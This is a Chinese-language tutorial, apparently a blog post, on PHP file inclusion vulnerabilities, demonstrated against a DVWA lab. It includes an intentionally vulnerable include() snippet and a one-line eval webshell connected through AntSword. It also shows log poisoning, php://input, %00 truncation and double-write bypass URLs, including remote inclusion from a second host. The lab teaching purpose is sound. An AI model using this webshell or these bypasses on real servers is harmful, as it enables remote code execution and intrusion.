文件包含漏洞
簡介:
包含操作,在大多數Web語言中都會提供的功能,但PHP對於包含文件所提供的功能太強大,太靈活,所以包含漏洞經常出現在PHP語言中,這也就導致了出現了一個錯誤現狀,很多初學者認為包含漏洞只出現PHP語言之中,殊不知在其他語言中可能出現包含漏洞。這也應了一句老話:功能越強大,漏洞就越多。
文件包含漏洞其本身就是一個嚴重的漏洞,其產生的原因就是
程序員開發的時候,未對包含的文件進行嚴格過濾、未部署完善給的權限控制,導致攻擊者可構造自己的圖片木馬文件當作程序執行。
包含主要分為本地和遠程;遠程需要一定的條件,且苛刻,本地相對容易一些。
測試代碼
<?php
$filename = $_GET['filename'];
include($filename);
?>
保存為:include.php
遠程文件包含
遠程包含優點:不需要將木馬傳到對方服務器,無論木馬在任何地方只要在互聯網上服務器,都能包含到目標去。
遠程包含缺點:條件苛刻
但前提需要滿足以下兩個條件:
- 魔術符號關閉
- allow_url_include開啟
舉例:[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-eX9E0rdm-1610795266333)(8、文件上傳及文件包含.assets/image-20210106103802542.png)]
本地文件包含
本地包含缺點:必須將腳本或者木馬傳到目標服務器的本地路徑下才能包含。
本地包含優點:相對容易實現。
本地包含圖片馬實例
利用文件包含漏洞:
本地包含繞過
1、包含漏洞上傳技巧(一句話圖片馬等)
一句話馬:
<?php @eval($_POST["123"]);?>
直接連接:
是無法利用的。
利用文件包含漏洞使用蟻劍連接:
是成功的,文件被執行。
2、包含日志文件
當某個PHP文件存在本地包含漏洞,而卻無法上傳正常文件,這就意味這有包含漏洞卻不能拿來利用,這時攻擊者就有可能會利用apache日志文件來入侵。
Apache服務器運行后會生成兩個日志文件,這兩個文件是access.log(訪問日志)和error.log(錯誤日志),apache的日志文件記錄下我們的操作,並且寫到訪問日志文件access.log之中
那么思路就是當我們對一個站點頁面提交一句話馬,找到其日志文件,利用文件包含漏洞達成連接。(所有的實現均建立在理想的條件下思路,即我們找到了日志路徑、具有文件包含漏洞、是apache中間件,不是說百分百,也沒有人敢保證百分百。)
首先:
開啟通用日志功能
點擊“其他選項菜單-打開配置文件-httpd-conf”,打開httpd.conf配置文件,第299行
CustomLog "logs/access.log" common
去掉前邊的 # ,並重啟apache。
其次,訪問一個站點頁面,且提交一個一句話馬使其留在日志中:
然后尋找一個具有文件包含漏洞的頁面進行文件包含日志,在使用蟻劍連接。
http://192.168.18.62:86/DVWA/vulnerabilities/fi/?page=../../../../Apache/logs/access.log
3、PHP包含讀文件
訪問URL,得到經過base64加密后的字符串,注意:convert.base64-encode
經解密還原得到如下:
解碼得到以下內容:
4、PHP包含寫文件(詳解如下)
注意這個想要達成需要滿足下面的條件:
-
只有在allow _url_include為on的時候才可以使用
-
同時如果想查看回顯結果那必須在C:\php\php-5.2.14-Win32下找到php.ini打開,查找disable_functions = eval,proc-open,oppen,exec,system…….刪掉system重啟apache。(eval加入的話一句話都連不上了,php中能執行命令的函數加入后,什么都連不上)
(默認是為空的)
注意安全加固中:查找display_funtions=寫入相關的命令,達到黑名單的臨時加固,真正想用白名單就得讓開發的重寫相關配置。
構造URL: http://192.168.18.62:86/dvwa/vulnerabilities/fi/?page=php://input,並且提交post數據為:
5、包含截斷繞過
執行代碼:
<?php
if(isset($_GET['page'])){
include $_GET['page'] .".php" ;
}else{
include 'home.php';
}
?>
//限制了頁面包含只能是.php結尾的文件,一般來說用戶是不可能上傳與中間件同類的文件,所以木馬一般都是其他的后綴,那么這里就限制了包含的文件類型。
對上面代碼的這種繞過方法只適合於magic_quotes_gpc=off的時候, php版本小於5.3.4,與白名單繞過一致,可通過%00截斷繞過,不過現在已經很難見到了,比如:index.php?file=info.txt//////////////…………超過一定數據的/
實例:
6、str_replace函數繞過(字符拼接)
以DVWA的模板為例medium,在代碼審計角度上,分析一下下面的代碼:
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\"" ), "", $file );
?>
-
使用str_replace函數是極其不安全的,因為可以使用雙寫繞過替換規則。
-
例如page=hthttp://tp://192.168.0.103/phpinfo.txt時,str_replace函數會將http://刪除"一次",於是依然是page=http://192.168.0.103/phpinfo.txt,成功執行遠程命令。
-
同時,因為替換的只是“../”、“..\”,所以對采用絕對路徑的方式包含文件是不會受到任何限制的。
例如:
1、本地文件包含交替雙寫繞過(..././代替../)
http://192.168.18.62:86/dvwa/vulnerabilities/fi/page=..././..././robots.txt
2、絕對路徑不受任何影響
http://192.168.18.62:86/dvwa/vulnerabilities/fi/page=C:/xampp/htdocs/dvwa/php.ini
3、遠程文件包含交替雙寫繞過
http://192.168.18.62:86/dvwa/vulnerabilities/fi/page=htthttp://p://192.168.18.23/pass.php
7、fnmatch函數繞過(通過內置協議)
以DVWA的模板為例hight,在代碼審計角度上,分析一下下面的代碼:
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Input validation
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
// This isn't the page we want!
echo "ERROR: File not found!";
exit;
}
?>
if(!fnmatch("file*",$file)&&$file!="include.php")
這段代碼的意思就是當文件既不是"include.php"也不是"file"(文件名file開頭)時才拋出錯誤,
反之也就是說,如果文件名符合其中一個條件既可以。http://192.168.18.62:86/dvwa/vulnerabilities/fi/?page=file:///C:/test.html 剛好滿足"file"(文件名file開頭)。說一下這個file://,在本地新建一個[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-GszbwUaD-1610795266395)(8、文件上傳及文件包含.assets/image-20210106173615792.png)]
然后瀏覽器打開,得到以下的效果:
當我們以滿足要求,繞過fnmatch函數的方式構造了下面的語句:
http://192.168.18.62:86/dvwa/vulnerabilities/fi/?page=file:///C:/test.html
直接訪問便得到了結果:
PHP內置協議
PHP帶有很多內置URL風格的封裝協議,可用於類似fopen()、copy()、file_exists()和filesize()的文件系統函數。
具體協議請參照http://www.php.net/manual/zh/wrappers.php
常見的一些:
| File:// | 訪問本地文件系統 |
|---|---|
| htt[p:// | 訪問HTTP(s)網址 |
| ftp:// | 訪問FTP(s)URLS |
| php:// | 訪問各個輸入/輸出流(I/o streams) |
| zlib:// | 壓縮流 |
| data:// | 數據(RFC2397) |
| ssh2:// | Secure Shell 2 |
| expect:// | 處理交互式的流 |
| glob:// | 查找匹配的文件路徑模式 |